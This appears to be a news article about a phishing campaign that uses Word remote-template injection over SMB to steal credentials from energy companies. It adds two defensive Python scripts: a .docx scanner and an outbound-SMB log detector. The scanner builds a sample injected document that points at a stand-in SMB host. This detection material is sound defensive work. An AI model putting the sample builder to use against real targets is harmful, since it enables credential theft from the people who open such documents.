Phishing emails targeting critical infrastructure firms can silently harvest credentials without even using macros, researchers warn.
Hackers are targeting energy companies, including those working in nuclear power, and other critical infrastructure providers with a technique that puts a new spin on a tried and tested form of cyberattack.
Phishing has long been a successful method of attack: cybercriminals craft a legitimate-looking email and send it to the intended victim with a malicious attachment which, when opened and executed, runs code to drop malware, be it ransomware, a data stealer, or some other payload.
But this campaign needs no malicious code embedded in the attachment. Instead, the Word document points at an external template, and when the document is opened Word tries to fetch that template over an SMB connection, which is enough to silently harvest credentials, say researchers at Talos Intelligence.
While the technique is currently used only to steal credentials, researchers warn it could be employed to drop other malware.
It arrives amid a string of attacks involving SMB, but unlike Petya or WannaCry it does not exploit a flaw in the protocol, and there is no known relation to EternalBlue, the leaked NSA Windows exploit used in those global ransomware attacks. What is abused here is ordinary behaviour: a Windows machine asked to open a file on a remote SMB server will attempt to authenticate to that server, and a server under attacker control can capture the client's authentication attempt.
Cyberattacks against critical infrastructure are not a new phenomenon, but since May 2017 hackers have been using this technique to target energy companies around the world, predominantly in Europe and the United States, with the goal of stealing the credentials of people working in critical infrastructure. It is unknown who is behind the attacks or where they are based.
Like other phishing campaigns, this one uses emails relevant to the targets as a lure, in this instance often posing as environmental reports or a CV/resume, with an attached Word document that attempts to harvest credentials when opened.
Researchers say the documents initially showed no indicators of compromise and none of the malicious macros usually associated with this sort of campaign. The attachments do, however, attempt to download a template file from a particular IP address, and instead of code the researchers found a template injection: a reference inside the document that makes Word establish a connection to an external server over SMB.
While the attack leverages SMB, the phishing itself is handled over HTTPS, and the user's credentials are harvested via a Basic Authentication prompt that asks for them directly.
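The template injection described above leaves a visible trace in the document package itself, which makes it cheap to triage attachments before anyone opens them. The following scanner is an added example written for this article, not code from the Talos report: a .docx is a zip of XML parts, and an attached template is declared in word/_rels/settings.xml.rels as a Relationship of type attachedTemplate with TargetMode="External". If the Target is a file:// URL or a UNC path, Word resolves it over SMB when the document opens, no macro required. The sample document the script builds, and the 192.0.2.x and 203.0.113.x addresses in it, are constructed for the example.

```python
"""Scan a Word (.docx/.dotx) package for a remote attached template.

Added example, not the Talos report's own tooling. The package built by
build_sample_docx() is constructed and minimal; real documents carry many
more parts, but the relationship that matters looks exactly like this.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")


def external_relationships(docx_bytes):
    """Yield (part, type, target) for every External relationship in any .rels part."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    yield name, rel.get("Type", ""), rel.get("Target", "")


def transport_for(target):
    """Classify how Word would fetch an external target: smb, http, local or other."""
    if target.startswith("\\\\") or target.startswith("//"):
        return "smb"                                   # UNC path -> SMB
    parsed = urlparse(target)
    if parsed.scheme == "file":
        return "smb" if parsed.netloc else "local"     # file://host/... is a UNC path too
    if parsed.scheme in ("http", "https"):
        return "http"
    return "other"


def has_macros(docx_bytes):
    """A VBA project is stored as word/vbaProject.bin; its absence is what made
    these documents look clean to macro-focused checks."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        return "word/vbaProject.bin" in zf.namelist()


def scan(docx_bytes):
    """Report macro presence plus every remote attached template and its transport."""
    remote = [
        {"part": part, "target": target, "transport": transport_for(target)}
        for part, rel_type, target in external_relationships(docx_bytes)
        if rel_type == ATTACHED_TEMPLATE
    ]
    return {"macros": has_macros(docx_bytes), "remote_templates": remote}


def build_sample_docx(template_target=None):
    """Constructed minimal package. When template_target is given it is attached
    as an external template, the way a template-injection document does it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
            '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>')
        zf.writestr("_rels/.rels",
            f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
            'Target="word/document.xml"/></Relationships>')
        zf.writestr("word/document.xml",
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body><w:p><w:r><w:t>Environmental report</w:t></w:r></w:p></w:body></w:document>')
        if template_target is not None:
            zf.writestr("word/settings.xml",
                '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                '<w:attachedTemplate r:id="rId1"/></w:settings>')
            zf.writestr("word/_rels/settings.xml.rels",
                f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                f'Type="{ATTACHED_TEMPLATE}" Target="{template_target}" TargetMode="External"/>'
                '</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed targets: a benign document, an SMB template, an HTTPS template.
    for target in (None, "file://192.0.2.10/share/template.dotm",
                   "https://203.0.113.5/template.dotm"):
        print(target, "->", scan(build_sample_docx(target)))
```

Run it over a real attachment with `scan(open(path, "rb").read())`: a document that reports `macros: False` but carries a remote template with transport `smb` is exactly the profile this campaign relies on. The same relationship type with an `http` transport is worth a look too, since the report notes the phishing side of the campaign is served over HTTPS.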
Talos has responded to the attacks by contacting affected customers and ensuring “they were aware of and capable of responding to the threat”.
The researchers also say this threat “illustrates the importance of controlling your network traffic and not allowing outbound protocols such as SMB except where specifically required for your environment”.
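Even where outbound SMB is blocked at the perimeter, the attempts themselves are the signal: an internal workstation trying to reach TCP/445 or TCP/139 on an Internet address is rarely legitimate. The following is an added example, not from the Talos report, of that check run over firewall log lines. The key=value log format and the addresses are constructed for the example; adapt `parse_line` to whatever your firewall or flow collector emits.

```python
"""Flag outbound SMB from internal hosts to external addresses in firewall logs.

Added example, not the Talos report's own detection. The log lines and the
key=value format below are constructed; the private-range check is RFC 1918.
"""
import ipaddress

SMB_PORTS = {445, 139}
PRIVATE = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample: one workstation talks to an internal file server (fine),
# then to an Internet host on 445, then follows up over HTTPS; a second host
# is denied on 139. The allow/deny outcome does not change the verdict.
SAMPLE_LOG = [
    "ts=2017-07-07T09:12:01Z src=10.20.5.17 dst=10.20.1.3 proto=tcp dport=445 action=allow",
    "ts=2017-07-07T09:12:04Z src=10.20.5.17 dst=192.0.2.10 proto=tcp dport=445 action=allow",
    "ts=2017-07-07T09:12:06Z src=10.20.5.17 dst=203.0.113.5 proto=tcp dport=443 action=allow",
    "ts=2017-07-07T09:15:40Z src=10.20.5.22 dst=198.51.100.9 proto=tcp dport=139 action=deny",
    "ts=2017-07-07T09:16:02Z src=10.20.5.22 dst=10.20.1.3 proto=udp dport=53 action=allow",
]


def is_internal(ip):
    """True for RFC 1918 addresses; extend PRIVATE with your own public ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE)


def parse_line(line):
    """Split a key=value log line into a dict; unknown tokens are ignored."""
    return dict(kv.split("=", 1) for kv in line.split() if "=" in kv)


def outbound_smb(lines):
    """Return every TCP/445 or TCP/139 connection from an internal source to an
    external destination, whether the firewall allowed or denied it."""
    hits = []
    for line in lines:
        f = parse_line(line)
        try:
            dport = int(f.get("dport", ""))
        except ValueError:
            continue
        if f.get("proto", "").lower() != "tcp" or dport not in SMB_PORTS:
            continue
        src, dst = f.get("src"), f.get("dst")
        if not src or not dst:
            continue
        if is_internal(src) and not is_internal(dst):
            hits.append({"ts": f.get("ts", ""), "src": src, "dst": dst,
                         "dport": dport, "action": f.get("action", "")})
    return hits


if __name__ == "__main__":
    for hit in outbound_smb(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['dst']}:{hit['dport']} ({hit['action']})")
```

Each hit names a source host worth pulling the recently opened documents from, and a destination address worth blocking. A denied attempt is still a finding: the document that triggered it is already on the host.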
However, Talos says it is unable to share all indicators of compromise, or who specifically has been targeted, due to “the nature in which we obtained intelligence related to these attacks”.